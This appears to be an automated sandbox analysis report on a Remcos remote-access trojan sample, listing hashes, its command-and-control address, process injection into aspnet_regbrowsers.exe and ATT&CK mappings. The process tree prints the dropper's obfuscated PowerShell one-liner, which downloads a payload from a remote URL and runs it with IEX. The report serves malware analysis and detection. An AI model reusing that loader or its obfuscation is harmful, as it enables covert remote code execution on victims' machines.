remcos | b61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388

General

Target

2.vbs
Size

662B
MD5

8da164753530662b1f603f7b23413223
SHA1

18a3665edcb3b3d3c53f9755bc225569a64ae642
SHA256

b61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388
SHA512

b3c8b9e85c2ab36abf02b479e68287890d94f8c125151ed88f8f26a509444de8207835b51131eee1095f7f3bf37e284e6853ff3b9aa63e91781f2e93b68e95c0

Score

10^/10

remcos rat

Malware Config

Extracted

Family

remcos

C2

194.5.97.183:8888

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

9 1796 powershell.exe
18 1796 powershell.exe
20 1796 powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4028 set thread context of 1648 4028 powershell.exe aspnet_regbrowsers.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
9	1796	powershell.exe
18	1796	powershell.exe
20	1796	powershell.exe

description	pid	process	target process
PID 4028 set thread context of 1648	4028	powershell.exe	aspnet_regbrowsers.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

Processes:

powershell.exepowershell.exe

pid	process
1796	powershell.exe
1796	powershell.exe
1796	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1796 powershell.exe
Token: SeDebugPrivilege 4028 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

aspnet_regbrowsers.exe

pid process

1648 aspnet_regbrowsers.exe

description	pid	process
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	4028	powershell.exe

pid	process
1648	aspnet_regbrowsers.exe

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 996 wrote to memory of 1796	996	WScript.exe	powershell.exe
PID 996 wrote to memory of 1796	996	WScript.exe	powershell.exe
PID 1796 wrote to memory of 4028	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 4028	1796	powershell.exe	powershell.exe
PID 4028 wrote to memory of 1384	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1384	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1384	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 3952	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 3952	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 3952	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1484	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1484	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1484	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 8	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 8	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 8	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 3892	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 3892	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 3892	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 3924	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 3924	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 3924	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1648	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1648	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1648	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1648	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1648	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1648	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1648	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1648	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1648	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1648	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1648	4028	powershell.exe	aspnet_regbrowsers.exe
PID 4028 wrote to memory of 1648	4028	powershell.exe	aspnet_regbrowsers.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601405.us.archive.org/15/items/all_20210407_20210407_0728/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4028

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
4⤵
PID:1384

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
4⤵
PID:3952

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
4⤵
PID:1484

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
4⤵
PID:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
4⤵
PID:3892

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
4⤵
PID:3924

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:1648

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\ Microsoft.ps1
MD5
b5795726bb04f5f9584184ae1f50777b

SHA1
91b250e76c41066a009b70200c5254a40980228b

SHA256
5d9ba7ab51a7d06ad420cb23f7c1e02b911fe2e25d7af1eebe25d1690231d784

SHA512
10ba2e523af4ccdf3e1e0867aa4d50a58919f5d39073bac17a8ab491f5ce09bcbda0730b9485a503adccfa323642b19e29879a0ad88f609d683080b668ef95fb

Download Submit
memory/1648-187-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1648-186-0x000000000042EEEF-mapping.dmp

Download
memory/1796-120-0x0000026CD4AA0000-0x0000026CD4AA1000-memory.dmp

Filesize
4KB

Download
memory/1796-123-0x0000026CEDB00000-0x0000026CEDB01000-memory.dmp

Filesize
4KB

Download
memory/1796-124-0x0000026CD4A90000-0x0000026CD4A92000-memory.dmp

Filesize
8KB

Download
memory/1796-125-0x0000026CD4A93000-0x0000026CD4A95000-memory.dmp

Filesize
8KB

Download
memory/1796-130-0x0000026CD4A96000-0x0000026CD4A98000-memory.dmp

Filesize
8KB

Download
memory/1796-114-0x0000000000000000-mapping.dmp

Download
memory/4028-135-0x0000000000000000-mapping.dmp

Download
memory/4028-160-0x000001D6E50F0000-0x000001D6E50F1000-memory.dmp

Filesize
4KB

Download
memory/4028-177-0x000001D6E50C0000-0x000001D6E50D8000-memory.dmp

Filesize
96KB

Download
memory/4028-141-0x000001D6CA763000-0x000001D6CA765000-memory.dmp

Filesize
8KB

Download
memory/4028-139-0x000001D6CA760000-0x000001D6CA762000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing